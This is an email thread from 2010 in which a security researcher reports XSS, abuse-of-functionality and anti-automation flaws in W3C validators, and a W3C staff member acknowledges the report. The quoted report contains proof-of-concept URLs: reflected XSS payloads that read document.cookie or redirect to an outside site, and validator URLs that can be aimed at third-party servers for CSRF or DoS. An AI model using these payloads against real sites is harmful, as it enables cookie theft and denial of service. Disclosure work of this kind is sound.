Hello Ian!
You are welcome.
First of all fix all XSS holes which I sent to you (in my two letters).
About abusing of W3C's services due to Abuse of Functionality and
Insufficient Anti-automation vulnerabilities in W3C's validators. As
you can
see, the abusing can be made due to Insufficient Anti-automation holes
in
all mentioned validators - it total 11 vulnerable validators (12
scripts).
So if you'll fix these holes in all validators by making protection from
automated requests (such as captcha), it fixes as Insufficient
Anti-automation holes, as in 99% fixes Abuse of Functionality holes.
In case of W3C Link Checker (which can be used for conducting of DoS
attacks
on both W3C's and other site's server) it'll be not enough, so making
additional protection (to limit abuse) will be required. But in most
cases
fixing of Insufficient Anti-automation will be enough.
Besides, last week I wrote an article Using of the sites for attacks on
other sites
(http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html
).
In this article I told about conducting of attacks on other sites via
Abuse
of Functionality vulnerabilities (similar to holes at W3C site).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
----- Original Message ----- From: "Ian Jacobs" <[email protected]>
To: "MustLive" <[email protected]>
Cc: <[email protected]>; <[email protected]>
Sent: Wednesday, June 30, 2010 6:39 PM
Subject: Re: Vulnerabilities at www.w3.org
On 30 Jun 2010, at 4:34 AM, MustLive wrote:
Hello administrator of www.w3.org!
I want to warn you about security vulnerabilities at your site.
Hi ML,
Thanks for sending this to us. We are aware of this and are looking
into
finding the right balance between continuing to offer services and to
avoid abuse.
Best,
_ Ian
These are Abuse of Functionality, Insufficient Anti-automation and
Cross-Site Scripting vulnerabilities.
Abuse of Functionality:
This functionality can be used for conducting of CSRF attacks on
other
sites.
http://validator.w3.org/feed/check.cgi?url=http://google.com
http://www.w3.org/2001/03/webdata/xsv?docAddrs=http://google.com&style=xsl
http://validator.w3.org/check?uri=http://google.com
http://jigsaw.w3.org/css-validator/validator?uri=http://google.com
http://validator.w3.org/checklink?uri=http://google.com
Note, that service W3C Link Checker can be used for scanning of
whole
site and so it consumes more resources, as of W3C's server, as of
site
which is scanning. It can be used for conducting of DoS attacks on
mentioned servers. About such attacks I mentioned in article DoS
attacks
via Abuse of Functionality vulnerabilities
(http://websecurity.com.ua/2981/ ).
http://qa-dev.w3.org/unicorn/check?ucn_uri=google.com&ucn_task=conformance
http://www.w3.org/RDF/Validator/ARPServlet?URI=http://google.com
Insufficient Anti-automation:
At these pages there is no protection from automated requests
(captcha).
Which allows to automate process of conducting of CSRF attacks at
other
sites.
XSS (IE):
http://www.w3.org/2001/03/webdata/xsv?docAddrs=%3Cscript%3Ealert(document.cookie)%3C/script%3E&style=xsl
http://www.w3.org/2001/03/webdata/xsv?docAddrs=%3Cscript%3Edocument.location%3D%22http://websecurity.com.ua%22%3C/script%3E&style=xsl
Works only in Internet Explorer.
Attend to security of all of yours web sites, web software and to
security audit.
I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/4320/ ).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
--
Ian Jacobs ([email protected]) http://www.w3.org/People/Jacobs/
Tel: +1 718 260 9447
